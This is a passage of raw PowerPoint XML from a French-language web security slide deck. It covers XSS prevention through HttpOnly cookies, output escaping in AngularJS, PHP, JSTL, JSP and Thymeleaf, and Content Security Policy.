          <p:cNvPr id="269" name="Shape 269"/>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="f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75" name="Shape 275"/>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DEMO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="276" name="Shape 276"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225776" y="1474599"/>
            <a:ext cx="4692449" cy="3908800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Shape 27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24</a:t>
            </a:fld>
            <a:endParaRPr lang="f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Cross-site scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Shape 283"/>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Prévention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Shape 284"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240925" y="1418175"/>
            <a:ext cx="5484599" cy="4381500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flag HttpOnly sur les cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Échappement (sanitisation) des caractères</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Content Security Policy (CSP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Shape 285"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5084875" y="1100125"/>
            <a:ext cx="2879999" cy="783000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:rPr>
              <a:t>AngularJS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>span</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>{{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>}}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>span</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>span </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>ng-bind-html=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>span</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Shape 286"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5226275" y="2084450"/>
            <a:ext cx="3015600" cy="1043399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>span</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>     &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>php echo htmlentities($var); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>span</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Shape 287"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5725525" y="3212300"/>
            <a:ext cx="3161700" cy="677999"/>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fr" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:rPr>
              <a:t>JSTL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>span</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>:out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>"${var}"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>/&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>span</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Shape 288"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5725525" y="3834850"/>
            <a:ext cx="2879999" cy="677999"/>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fr" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:rPr>
              <a:t>JSP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>span</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>${fn:escapeXml(var)}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>span</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Shape 289"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5226275" y="4752825"/>
            <a:ext cx="3563400" cy="961499"/>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fr" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:rPr>
              <a:t>THYMELEAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>span </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>:text=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>"${var}"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>span</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>span </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>:utext=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>"${var}"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>span</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Shape 290"/>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25</a:t>
            </a:fld>
            <a:endParaRPr lang="f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685800" y="2733675"/>
            <a:ext cx="7772400" cy="1470000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="6000"/>
              <a:t>CSP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Shape 296"/>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26</a:t>
            </a:fld>
            <a:endParaRPr lang="f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Content Security Policy (CSP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Shape 302"/>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Définition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Shape 303"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240925" y="1646775"/>
            <a:ext cx="8782500" cy="1629899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
